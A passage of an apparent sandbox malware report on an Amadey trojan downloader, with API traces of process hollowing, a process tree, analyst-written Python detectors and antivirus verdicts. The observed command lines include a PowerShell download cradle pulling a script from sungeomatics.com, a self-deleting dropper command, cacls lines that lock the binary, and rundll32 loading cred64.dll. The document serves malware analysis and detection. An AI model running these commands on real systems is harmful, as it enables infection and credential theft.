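            # thread-start stub (EIP) with the image entry point in EAX, so a
            # hollower points EAX into the region it just mapped. Here
            # EAX = 0x402dd8, inside the 0x9000-byte RWX region at 0x400000.
            eax = rec.get("registers.eax", 0)
            s["stages"].append("entry_redirected" if _inside(eax, s["rwx"]) else "context_changed")
        elif api == "NtResumeThread":
            s["stages"].append("resumed")
    for s in state.values():
        st = set(s["stages"])
        s["hollowed"] = bool(
            {"created_suspended", "resumed"} <= st
            and {"image_unmapped", "rwx_allocated"} & st
            and {"peb_imagebase_patched", "rwx_written"} & st
            and {"entry_redirected", "context_changed"} & st
        )
        del s["rwx"]
    return dict(state)


if __name__ == "__main__":
    for pid, v in analyse(TRACE).items():
        verdict = "HOLLOWED" if v["hollowed"] else "not hollowed"
        print(pid, v["filepath"], verdict, v["stages"])
```

Run stand-alone it prints one verdict per child PID; PID 2644 reaches every stage and is flagged, PID 560 stops at created_suspended and resumed and is not. Keying on the target PID rather than on handles is deliberate: the report's handle values (0x7c, 0x80) are reused across unrelated records, while the PID ties the six calls together.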
cmdline CACLS "..\73456c80a6" /P "test22:N"
cmdline CACLS "jbruyer.exe" /P "test22:R" /E
cmdline CACLS "..\73456c80a6" /P "test22:R" /E
cmdline CACLS "jbruyer.exe" /P "test22:N"
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

net_type: 0x00250000
1222 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2792
thread_handle: 0x00000320
process_identifier: 2788
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000328
1 1 0

CreateProcessInternalW

thread_identifier: 1528
thread_handle: 0x0000000000000a88
process_identifier: 560
current_directory: C:\Windows\system32
filepath: C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
track: 1
command_line: "C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe" -downpower -msgwndname=wpssetup_message_1A705C3 -curinstalltemppath=C:\Users\test22\AppData\Local\Temp\wps\~1a70025\
filepath_r: C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000000000000420
1 1 0

NtResumeThread

thread_handle: 0x0000000000000a88
suspend_count: 1
process_identifier: 560
1 0 0

CreateProcessInternalW

thread_identifier: 2988
thread_handle: 0x0000008c
process_identifier: 2984
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 3028
thread_handle: 0x00000088
process_identifier: 3024
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "jbruyer.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 908
thread_handle: 0x0000008c
process_identifier: 1964
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "jbruyer.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2108
thread_handle: 0x0000008c
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 192
thread_handle: 0x00000094
process_identifier: 2068
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\73456c80a6" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2228
thread_handle: 0x0000008c
process_identifier: 2232
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\73456c80a6" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 3024
1 0 0

NtResumeThread

thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 1964
1 0 0

NtResumeThread

thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2068
1 0 0

NtResumeThread

thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2232
1 0 0

CreateProcessInternalW

thread_identifier: 2636
thread_handle: 0x0000007c
process_identifier: 2644
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000002051\toolspub1.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000080
1 1 0

NtGetContextThread

thread_handle: 0x0000007c
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 2644
process_handle: 0x00000080
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000080
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2644
process_handle: 0x00000080
1 1 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000007c
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x0000007c
suspend_count: 1
process_identifier: 2644
1 0 0

CreateProcessInternalW

thread_identifier: 2724
thread_handle: 0x000001ec
process_identifier: 2720
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\sysnative\cmd.exe
track: 1
command_line: "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"
filepath_r: C:\Windows\sysnative\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000001f4
1 1 0

CreateProcessInternalW

thread_identifier: 3056
thread_handle: 0x00000548
process_identifier: 2860
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000550
1 1 0

CreateProcessInternalW

thread_identifier: 3000
thread_handle: 0x0000000000000060
process_identifier: 2956
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0

NtResumeThread

thread_handle: 0x0000000000000288
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

thread_handle: 0x00000000000002dc
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

thread_handle: 0x000000000000036c
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

thread_handle: 0x00000000000004d0
suspend_count: 1
process_identifier: 2956
1 0 0

NtResumeThread

thread_handle: 0x00000000000006ec
suspend_count: 1
process_identifier: 2956
1 0 0

CreateProcessInternalW

thread_identifier: 1400
thread_handle: 0x00000084
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp\73456c80a6
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000000d0
suspend_count: 1
process_identifier: 2136
1 0 0

CreateProcessInternalW

thread_identifier: 2380
thread_handle: 0x0000001c
process_identifier: 2452
current_directory:
filepath:
track: 1
command_line: .\Install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2616
thread_handle: 0x0000001c
process_identifier: 2624
current_directory:
filepath:
track: 1
command_line: .\Install.exe /S /site_id "385104"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 1108
thread_handle: 0x000000dc
process_identifier: 1668
current_directory:
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
filepath_r: C:\Windows\system32\rundll32.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000000d8
1 1 0

NtResumeThread

thread_handle: 0x0000000000000108
suspend_count: 1
process_identifier: 1668
1 0 0

CreateProcessInternalW

thread_identifier: 2188
thread_handle: 0x0000001c
process_identifier: 108
current_directory:
filepath:
track: 1
command_line: .\Install.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 1544
thread_handle: 0x0000001c
process_identifier: 1140
current_directory:
filepath:
track: 1
command_line: .\Install.exe /IjXdidOBxH "385118" /S
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000108
1 1 0

CreateProcessInternalW

thread_identifier: 2164
thread_handle: 0x000001e0
process_identifier: 2368
current_directory:
filepath: C:\Windows\System32\certreq.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\certreq.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000019c
1 1 0
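Analyst note, added to this page and not part of the ZeroBOX report: the process tree above carries several command lines worth triaging on their own, without the API trace. The cacls pairs (":N" then ":R" /E on jbruyer.exe and its directory) lock the dropped binary against the user, the cmd /S /D /c" echo Y" children launched just before each cacls /P feed its confirmation prompt, the ping-then-del line self-deletes postmon.exe, the powershell IEX DownloadString line is a download cradle for debug2.ps1 on sungeomatics.com, and rundll32 loads cred64.dll from AppData\Roaming by export name. The Python below is this note's own regex-based triage over those exact lines, transcribed by hand (one WPS installer line loses its trailing backslash to fit a raw string); the tag names and patterns are the example's own, and the WPS installer line and the bare ping are kept as controls that must stay untagged.

```python
"""Command-line triage for the process tree in this report.

Added example, not part of the ZeroBOX output. OBSERVED is transcribed from
the report's cmdline and CreateProcessInternalW rows; RULES and the tag names
are this example's own, not a published rule set.
"""
import re
from urllib.parse import urlparse

OBSERVED = [  # constructed from the report; order is referenced below
    r'CACLS "jbruyer.exe" /P "test22:N"',
    r'CACLS "jbruyer.exe" /P "test22:R" /E',
    r'CACLS "..\73456c80a6" /P "test22:N"',
    r'C:\Windows\system32\cmd.exe /S /D /c" echo Y"',
    r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\1000003051\postmon.exe" >> NUL',
    r'''"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://sungeomatics.com/css/colors/debug2.ps1')"''',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main',
    r'.\Install.exe /S /site_id "385104"',
    # trailing backslash of -curinstalltemppath dropped so the raw string parses
    r'"C:\ProgramData\kingsoft\20230626_153941\WPSOffice_11.exe" -downpower -msgwndname=wpssetup_message_1A705C3 -curinstalltemppath=C:\Users\test22\AppData\Local\Temp\wps\~1a70025',
    r'ping 127.0.0.1',
]

RULES = [
    # cacls /P replaces the ACL outright: ":N" is no access, ":R" with /E edits to read-only
    ("acl_deny_self", re.compile(r'\bcacls\b.*?/P\s+"[^"]+:N"', re.I)),
    ("acl_readonly_self", re.compile(r'\bcacls\b.*?/P\s+"[^"]+:R"\s+/E', re.I)),
    # spawned immediately before each cacls /P in the report; answers its Y/N prompt
    ("echo_y_prompt_feed", re.compile(r'cmd\.exe\s+/S\s+/D\s+/c"\s*echo\s+Y"', re.I)),
    # ping to localhost as a delay, then delete a file: self-removal of a dropper
    ("self_delete_via_ping", re.compile(r'ping\s+127\.0\.0\.1.*&&\s*del\s+"', re.I)),
    ("powershell_download_cradle", re.compile(r'powershell.*\bIEX\b.*DownloadString\(', re.I)),
    # DLL under %APPDATA% handed to rundll32 with an export name (path without spaces assumed)
    ("rundll32_appdata_dll", re.compile(
        r'rundll32\.exe"?\s+(\S+\\AppData\\(?:Roaming|Local)\\\S+\.dll)\s*,\s*(\w+)', re.I)),
    ("silent_install_switch", re.compile(r'\bInstall\.exe\s+.*?/S\b', re.I)),
]


def tags_for(cmdline):
    """Names of every rule that matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(cmdlines):
    """[(cmdline, [tags]), ...] in input order; an empty list means no finding."""
    return [(c, tags_for(c)) for c in cmdlines]


def cradle_url(cmdline):
    """URL pulled by an IEX(...DownloadString('...')) cradle, or None."""
    m = re.search(r"DownloadString\(\s*'([^']+)'\s*\)", cmdline)
    return m.group(1) if m else None


def cradle_host(cmdline):
    """Hostname of the cradle URL, the value to pivot on in DNS/proxy logs."""
    url = cradle_url(cmdline)
    return urlparse(url).hostname if url else None


if __name__ == "__main__":
    for cmd, tags in triage(OBSERVED):
        print(f"{', '.join(tags) or '-':28} {cmd[:90]}")
        if "powershell_download_cradle" in tags:
            print(f"{'':28} fetches {cradle_url(cmd)} (host {cradle_host(cmd)})")
```

Each rule is deliberately narrow (the literal 127.0.0.1 plus && del, cacls /P with a ":N" or ":R" grant, a DLL path under AppData handed to rundll32 with an export) so that the WPS installer line and the bare ping 127.0.0.1 produce no tags; broadening them to any cacls or any ping is where false positives start.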
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
DrWeb Trojan.Siggen20.65496
MicroWorld-eScan Gen:Variant.Zusy.446510
ClamAV Win.Malware.Doina-10001799-0
FireEye Generic.mg.3dd072d71907f6d5
ALYac Gen:Variant.Zusy.446510
Malwarebytes Malware.AI.1627801230
VIPRE Gen:Variant.Zusy.446510
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 0057994f1 )
Alibaba TrojanDownloader:Win32/Amadey.a00606fe
K7GW Trojan-Downloader ( 0057994f1 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Zusy.D6D02E
BitDefenderTheta Gen:NN.ZexaF.36270.ouW@aWGuoNki
Cyren W32/Amadey.C1.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Zusy.446510
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Njgl
Emsisoft Gen:Variant.Zusy.446510 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
TrendMicro Trojan.Win32.AMADEY.YXDFXZ
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
Sophos Mal/Generic-R
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1319380
MAX malware (ai score=85)
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Amadey.GJU!MTB
ZoneAlarm HEUR:Trojan-Downloader.Win32.Deyma.gen
GData Win32.Trojan-Downloader.Amadey.LXCUSU
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
McAfee Downloader-FCND!3DD072D71907
Cylance unsafe
Panda Trj/GdSda.A
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXDFXZ
Rising Trojan.Generic@AI.100 (RDML:nsu7q1pN70IgBYqlEu3h2Q)
Ikarus Trojan-Downloader.Win32.Amadey
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
Cybereason malicious.71907f